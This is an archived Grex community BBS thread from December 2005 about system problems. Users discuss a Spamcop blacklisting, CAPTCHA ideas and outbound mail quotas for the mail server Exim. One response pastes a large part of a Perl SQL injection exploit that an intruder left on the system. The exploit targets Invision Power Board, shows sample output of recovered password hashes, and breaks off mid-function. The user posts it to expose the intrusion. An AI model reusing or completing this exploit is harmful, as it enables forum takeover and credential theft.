|
Grex > Helpers > #147: Grex System Problems - Winter 2005/06 | |
|
| Author |
Message |
| 25 new of 260 responses total. |
cross
|
|
response 36 of 260:
|
Dec 28 19:15 UTC 2005 |
This response has been erased.
|
tod
|
|
response 37 of 260:
|
Dec 28 19:30 UTC 2005 |
warning: libc.so.38.2: minor version >= 3 expected, using it anyway
PicoSpan T3.3a; designed by Marcus Watts
copyright 1984 NETI; licensed by Unicon Inc.
|
gull
|
|
response 38 of 260:
|
Dec 28 20:38 UTC 2005 |
Re resp:35: Being listed on Spamcop is not, in itself, enough to get
Spamassassin to reject mail in its default configuration. Spamassassin
works on a "point" system. Various signs of spam are worth certain
numbers of points. If the score exceeds a user-configurable threshold,
the mail is tagged as spam or rejected, depending on the configuration.
Being listed in bl.spamcop.net is only worth 1.8 points towards a
default spam threshold of 5.
Most likely, some clueless mail admin is blocking all mail from hosts
in Spamcop's blacklist. There are blacklists that I feel are accurate
enough to use that way, but bl.spamcop.net definitely isn't one of
them.
|
tod
|
|
response 39 of 260:
|
Dec 29 07:00 UTC 2005 |
!help
Welcome to Grex's help archives!
Please mail staff with additions, corrections, or if you need help!
Valerie Mates, valerie@cyberspace.org. Last update 6/5/97
Available documents are:
0. The new, excellent, Grex FAQ. Highly recommended!
1. An Introduction to Grex ("Take Me To Your Modem")
2. Frequently Asked Questions (more useful to non-Grexers)
3. An Introduction To The Picospan Conferencing ("BBS") System.
4. The Grex Declaration Of Principles
5. Who pays for Grex? Can I help? Does this cost money?
6. Phone list
7. Article about Grex that was in the People's Food Co-op Newsletter
8. Choose this option to get >>>help from a real live person<<<
9. Run the menu system.
A. Run Lynx.
B. Go to the conferences ("BBS").
C. Change settings on your account (password, name, shell, .plan file, etc)
D. Frequently Asked Questions about Grex's Party program
E. Frequently Asked Questions about Web Pages on Grex
Choose a number (or letter), or q to quit: 6
Last update: 4/25/2001 by scott@cyberspace.org
The phone numbers for Grex are:
phone number device modem type max. speed
------------------------------------------------
+1 734 761 3000 Groovy GVC 14.4 14400 bps
+1 734 761 5041 Groovy GVC 14.4 14400 bps
+1 734 761 3411 Groovy GVC 14.4 14400 bps
+1 734 761 3451 Groovy GVC 14.4 14400 bps
+1 734 761 3554 Groovy GVC 14.4 14400 bps
+1 734 761 3596 Groovy GVC 14.4 14400 bps
+1 734 761 2517 Groovy GVC 14.4 14400 bps
In normal operation, these numbers trunk hunt, so dialing (734) 761-3000
will give you the first available line out of these seven. All of the
modems connect to a terminal server which makes an 8-bit telnet connection
to Grex.
Press Enter to continue...
|
keesan
|
|
response 40 of 260:
|
Dec 29 16:52 UTC 2005 |
Tod, can you volunteer to write up a replacement page for some staff member
to post?
We are still blacklisted by spamcop.
Your ip number was found on spamcopgl.gis.net RBL database.
Freeshell is apparently using this same database by itself:
blocked according spamcop.net. See http://spamcop.net/bl.
It is at least three days now - if we ask nicely will spamcop take us off the
list?
|
tod
|
|
response 41 of 260:
|
Dec 29 16:55 UTC 2005 |
re #40
I don't know the numbers but I'd be glad to write a revision.
|
keesan
|
|
response 42 of 260:
|
Dec 29 17:00 UTC 2005 |
It is possible to get on the spamcop whitelist. Spamex (provides disposable
email addresses) just managed to do this. They are also supposed to take us
off the list when the spamming stops. Did it stop? Do they report to us
where exactly the spam is coming from?
|
mary
|
|
response 43 of 260:
|
Dec 29 19:06 UTC 2005 |
Maybe before we try to get off any spam lists we should make sure
we don't deserve to be blocked. Grex has a problem with a very few
users abusing our open mail. Staff knows about it and is trying to
fix it. It's not fixed yet.
|
gull
|
|
response 44 of 260:
|
Dec 29 19:41 UTC 2005 |
It's listed because Spamcop users have reported it as a source of spam
ten times in the last week. Unfortunately they don't show you what got
you listed, so it's a bit hard to say for sure who's causing the
problem.
|
bhoward
|
|
response 45 of 260:
|
Dec 30 01:31 UTC 2005 |
Dollars to donuts we were listed due to a recent spate of accounts
created from users on AOL's networks that sign-in and blast a ton
of spam before getting shut down.
These spammers seem to have automated the account creation process
and installation of their spamming scripts which makes me wonder
if it is time to implement some kind of CAPTCHA to protect against
scripted account creation and maybe also institute some sort of
fixed delay before allowing access to mail on grex.
I don't think we have the staffing to require formal validation
like we do for membership but even a simple requirement that an
account be older than say 10 days before it is allowed to send mail
might be enough of a barrier to slow the hit-and-run spammers.
Alternatively, maybe someone out there has implemented per-user
outbound mail quotas for exim (though I didn't find anything the
last time I checked).
|
cross
|
|
response 46 of 260:
|
Dec 30 01:40 UTC 2005 |
This response has been erased.
|
nharmon
|
|
response 47 of 260:
|
Dec 30 02:05 UTC 2005 |
Here is a thought... ASCII art. Generate some word in ASCII art that the
person creating the account has to recognize in order to complete
his/her registration. A text-based version of what yahoo does. :)
|
bhoward
|
|
response 48 of 260:
|
Dec 30 02:19 UTC 2005 |
Re#46 Personally, I want to preserve the ability for non-members to
send mail. I just would like to raise the barrier to make it difficult
for automated account creation.
Having new users placed into a trial group until they ran some sort
of CAPTCHA requesting access and having that access granted after a
48 hour delay would probably do the job. Adding a per-day outbound
mail quota on top of that would pretty much kill the problem without
unduly restricting new members.
|
aruba
|
|
response 49 of 260:
|
Dec 30 04:19 UTC 2005 |
Re #47: That's a cute idea!
|
bhoward
|
|
response 50 of 260:
|
Dec 30 05:00 UTC 2005 |
An ascii-art / figlet kine CAPTCHA somehow seems very appropriate
for grex :-)
|
keesan
|
|
response 51 of 260:
|
Dec 30 05:33 UTC 2005 |
What size quota? I just sent out (not from grex this time because I don't
want anyone replying here because it is unreliable) the same little mail to
about 40 people (happy new year). How many copies do spammers send?
|
tsty
|
|
response 52 of 260:
|
Dec 30 06:24 UTC 2005 |
39 ....
|
gull
|
|
response 53 of 260:
|
Dec 30 07:29 UTC 2005 |
Exim 4.x has a very sophisticated ACL mechanism. I would bet someone
has implemented outbound quotas in it at some point.
The ASCII CAPTCHA idea is a pretty good one, too. :)
|
bhoward
|
|
response 54 of 260:
|
Dec 30 08:39 UTC 2005 |
Sindi, what often happens is that someone will come in from AOL,
create a batch of accounts, then set each one going mass mailing
anywhere from a few hundred to several 1000 different addresses.
I believe on a few occasions, Steve has had to clean up spam
loads on the order of 10's of thousands.
I'm sure you are right, David. I just don't know much about exim
yet (I run postfix for my family ISP)...but I expect I will be
learning a bit more as I wade into this.
|
rcurl
|
|
response 55 of 260:
|
Dec 30 16:29 UTC 2005 |
What do spammers give typically as a *return* address when they spam from
Grex?
|
aruba
|
|
response 56 of 260:
|
Dec 30 17:57 UTC 2005 |
I think the return address on most spam is a fake email address, or a stolen
one. Spammers expect you to respond by going to their website, not by
replying to their email.
|
gull
|
|
response 57 of 260:
|
Dec 30 20:10 UTC 2005 |
Re resp:54: The Exim email list is extremely helpful. There's also a
package of sample configurations that has a lot of useful stuff in it.
|
keesan
|
|
response 58 of 260:
|
Dec 30 20:16 UTC 2005 |
Can you limit outgoing mails to 25 or 50 addresses per mailing, and 100 mails
per day, or 1MB per day? Or even limit to 10 and 25, with exceptions for
members?
|
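The outbound limits proposed in responses 45, 48 and 58, sketched as a single policy check. This is an added example, not part of the thread and not Grex's or Exim's configuration. The thresholds are the figures floated in those responses; `Account` and `check_outbound` are hypothetical names, and the sample accounts are constructed.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# Figures floated in the thread; the policy code itself is hypothetical.
MIN_ACCOUNT_AGE = timedelta(days=10)   # resp 45: account "older than say 10 days"
MAX_RCPTS_PER_MESSAGE = 25             # resp 58: "25 or 50 addresses per mailing"
MAX_MESSAGES_PER_DAY = 100             # resp 58: "100 mails per day"

@dataclass
class Account:
    name: str
    created: datetime
    is_member: bool = False                    # resp 58: "exceptions for members"
    sent: list = field(default_factory=list)   # timestamps of accepted messages

def check_outbound(acct, rcpt_count, now):
    """Return (allowed, reason) for one outbound message; record it if allowed."""
    if not acct.is_member:
        # Waiting period: blunts create-account-and-blast automation.
        if now - acct.created < MIN_ACCOUNT_AGE:
            return False, "account too new to send mail"
        # Per-message cap: stops one message fanning out to thousands.
        if rcpt_count > MAX_RCPTS_PER_MESSAGE:
            return False, "too many recipients in one message"
        # Sliding 24-hour window: drop entries older than a day, then count.
        window_start = now - timedelta(days=1)
        acct.sent = [t for t in acct.sent if t > window_start]
        if len(acct.sent) >= MAX_MESSAGES_PER_DAY:
            return False, "daily message quota exceeded"
    acct.sent.append(now)
    return True, "ok"

if __name__ == "__main__":
    now = datetime(2005, 12, 30, 20, 16, tzinfo=timezone.utc)
    # Constructed sample accounts.
    fresh = Account("fresh", created=now - timedelta(days=2))
    regular = Account("regular", created=now - timedelta(days=400))
    member = Account("member", created=now - timedelta(days=2), is_member=True)
    print(check_outbound(fresh, 1, now))     # blocked by the waiting period
    print(check_outbound(regular, 40, now))  # blocked by the recipient cap
    print(check_outbound(member, 40, now))   # members are exempt
```

With these values a non-member account can still reach 25 × 100 = 2,500 addresses a day, so the daily limit may be better counted in recipients than in messages.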
tod
|
|
response 59 of 260:
|
Dec 30 21:51 UTC 2005 |
SQL exploit hackers in action on Grex....
mirror pf 62.33.88.166 4:13PM 4 perl ipb.pl http://forum.unix.kg
/ 4
!more ~mirror/ipb.pl
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .=chr($i);;
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
Then under the "Pass nik" directory are a file for ID's and another...
NICE...NOT!
|
keesan
|
|
response 60 of 260:
|
Dec 30 22:45 UTC 2005 |
Please translate the previous response.
|